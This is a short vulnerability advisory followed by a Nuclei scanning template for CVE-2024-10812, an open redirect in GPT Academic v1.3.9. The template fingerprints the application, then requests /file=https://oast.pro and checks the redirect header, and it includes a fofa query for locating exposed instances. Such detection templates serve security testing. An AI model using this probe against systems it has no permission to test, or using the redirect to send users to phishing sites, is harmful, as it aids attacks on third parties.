An open redirect vulnerability exists in GPT Academic v1.3.9, where the file parameter in the /file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
PoC代码[已公开]
id: CVE-2024-10812
info:
name: GPT Academic v1.3.9 - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
An open redirect vulnerability exists in GPT Academic v1.3.9, where the file parameter in the /file= endpoint can be manipulated to redirect users to malicious websites. This could facilitate phishing attacks by tricking users into visiting attacker-controlled URLs.
reference:
- https://huntr.com/bounties/51408ebd-e0be-489d-8088-f210087dbd6a
classification:
epss-score: 0.00236
epss-percentile: 0.46602
metadata:
verified: true
max-request: 1
fofa-query: body="gpt_academic"
tags: cve,cve2024,huntr,redirect,oss,gpt_academic,binary-husky
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(body), "gpt_academic", "gptacademic")'
internal: true
- method: GET
path:
- "{{BaseURL}}/file=https://oast.pro"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
# digest: 490a0046304402201a7499156d5dfcfcdbda31732dab74e96192fe3bd326b43fcd0f9b16883a8920022027957756db720d7c689789c24433455e1300fd66ffa7e3eb517ed2c28f3a8745:922c64590222798bb761d5b6d8e72950